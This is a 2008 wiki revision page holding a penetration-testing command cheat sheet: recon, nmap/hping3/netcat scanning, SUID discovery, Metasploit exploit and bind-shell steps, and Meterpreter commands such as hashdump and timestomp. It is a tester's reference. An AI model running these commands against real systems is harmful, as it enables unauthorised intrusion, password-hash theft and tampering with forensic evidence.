Difference between revisions of "Linux Commands"

From SkullSecurity
Jump to navigation Jump to search
Line 204: Line 204:


===Metasploit===
===Metasploit===
<pre></pre>
Running an exploit
<pre>msf&gt; show exploits
msf&gt; use exploit/windows/smf/ms05_039_php
msf&gt; show payloads
msf&gt; set PAYLOAD windows/shell/bind_tcp
msf&gt; show options
msf&gt; set RHOST 10.10.10.10
msf&gt; exploit
</pre>
 
Interacting with sessions
<pre>
msf&gt; sessions -l
msf&gt; sessions -i &lt;N&gt;
</pre>
 
===Meterpreter===
Filesystem commands
<pre>&gt; cd
&gt; lcd
&gt; pwd / getwd
&gt; ls
&gt; cat
&gt; download / upload
&gt; mkdir / rmdir
&gt; edit
&gt; getpid
&gt; getuid
&gt; ps
&gt; kill
&gt; execute
&gt; migrate
&gt; ipconfig
&gt; portfwd
&gt; route
&gt; idletime
&gt; uictl &lt;enable/disable&gt; &lt;keyboard/mouse&gt;
</pre>
 
Modules
<pre>&gt; use &lt;modulename&gt
&gt; use priv
&gt; hashdump
&gt; timestomp</pre>

Revision as of 16:04, 16 July 2008

Recon

whois

$ whois [-h whois_server] name

nslookup

$ nslookup <target>

dig

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
$ dig [@server] <name> [type]
  • Zone transfer
$ dig [@server] <domain> -t AXFR

* Iterative zone transfer
<pre>$ dig [@server] <domain> -t IXFR=<N>

BiLE.pl

$ ./BiLE <target> <result_file>
$ ./BiLE-weigh.pl <site_of_interest> <BiLE_output.mine>
$ ./tld-expand.pl
$ ./vet-IPrange.pl
$ ./qtrace.pl

Scanning

tcpdump

Parameters

  • -n -- use numbers
  • -i <interface>
  • -v -- be verbose
  • -r <file>/-w <file> -- read from/write to file
  • -x -- print hex
  • -A -- print ASCII
  • -X -- print hex and ASCII
  • -s <snaplen> -- length to capture (-s0 for all data)

Filter string

  • Protocol
    • ether, ip, ip6, arp, rarp, tcp, udp
  • Type
    • host <host>
    • net <network>
    • port <portnum>
    • portrange <start-end>
  • Direction
    • src
    • dst
  • Logic
    • and
    • or
  • Show TCP against target 10.10.10.10 in ASCII
tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
  • Show all UDP from 10.10.10.10
tcpdump [-i tap0] -n udp and src 10.10.10.10
  • Show all TCP port 80 packets going to or from host 10.10.10.10
tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10

hping3

TCP Flags

  • --syn, --fin, --rst, --push, --ack, --urg

Target selection

  • --rand-dest
  • --interface <int>

Source selection

  • --spoof <hostname>
  • --rand-source

Port selection

  • --destport <port>
  • --destport +<port> -- increment by one for each packet received
  • --destport ++<port> -- increment by one for each packet sent
  • --scan <portrange>
  • --baseport <port>
  • --keep -- don't increment the source port

Speed options

  • --fast, --faster, --flood
  • --interval <N> -- interval in seconds
  • --interval u<N> -- interval in microseconds

Other options

  • --count <N>
  • --beep
  • --file <filename>
  • --data <N>

traceroute

Parameters

  • -f <N> -- Initial TTL
  • -g <hostlist> -- Loose source route
  • -I -- use ICMP Echo instead of UDP
  • -m <N> -- maximum number of hops (default 30)
  • -n -- numeric
  • -p <baseport> -- set the base UDP port
  • -w <N> -- wait N seconds (default 5)

Layer Four Traceroute (lft)

http://pwhois.org/lft/index.who

Options

  • -u -- use UDP
  • -p -- use ICMP echo
  • -d <port> -- destination port (default 80)
  • -s <port> -- source port
  • -L <N> -- length (including layer 3/4 header)
  • -A -- look up AS number
  • -P -- traceroute via tcp

nmap

Pinging

  • -PN -- don't ping
  • -PB -- default, ICMP Echo + TCP to port 80
  • -PE -- ICMP Echo request
  • -PS[portlist] -- TCP SYN
  • -PP -- ICMP Timestamp request
  • -PM -- ICMP Address Mask request
  • -PR -- default on subnet, use ARP to identify hosts

Scanning

  • -sT -- TCP Connect scan
  • -sS -- SYN scan
  • -sA -- ACK scan
  • -sF -- FIN scan
  • -sN -- Null scan
  • -sX -- Xmas Tree scan
  • -sM -- Maimon scan
  • --scanflags specify your own flags
  • -sU -- UDP scan

Fingerprinting

  • -O -- OS fingerprint
  • -sV -- Version scan

Scripts

  • -sC -- run all scripts
  • --script=<category,dir,src,etc&/gt;
  • --script-trace

Timing

  • --paranoid, --sneaky, --polite, --normal, --aggressive, --insane
  • --host_timeout, --max_rtt_timeout, --min-rtt-timeout, --initial_rtt_timeout, --max-parallelism, --scan_delay

Other options

  • -p<ports>
  • -F -- fast (checks only ports in nmap-services)
  • --packet-trace
  • --traceroute
  • --badsum

THC amap

Options

  • -q -- quiet (omit closed ports)
  • -v -- verbose
  • -b -- print banners

Example:

amap -bqv 10.10.10.10 1-50

Enumerating users

Commands

$ cat /etc/passwd
$ finger
$ who
$ w

Remotely:

$ finger @<target>

netcat

Options

  • -l -- listen mode
  • -L -- listen harder (Windows only)
  • -u -- UDP mode
  • -p -- local port (in listen mode, the port to listen on)
  • -e -- program to execute
  • -n -- don't resolve names
  • -z -- don't send any data
  • -w<N> -- timeout for connects
  • -v/-vv -- be verbose

Scanning

echo "" | nc -v -n -w1 <target> <port-range>

Exploitation

Finding SetUID/SetGID programs

find / -type f \( -perm -4000 -o -perm -2000 \) -print
find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done

Metasploit

Running an exploit

msf> show exploits
msf> use exploit/windows/smf/ms05_039_php
msf> show payloads
msf> set PAYLOAD windows/shell/bind_tcp
msf> show options
msf> set RHOST 10.10.10.10
msf> exploit

Interacting with sessions

msf> sessions -l
msf> sessions -i <N>

Meterpreter

Filesystem commands

> cd
> lcd 
> pwd / getwd
> ls
> cat
> download / upload
> mkdir / rmdir
> edit
> getpid
> getuid
> ps
> kill
> execute
> migrate
> ipconfig
> portfwd
> route
> idletime
> uictl <enable/disable> <keyboard/mouse>

Modules

> use <modulename&gt
> use priv
> hashdump
> timestomp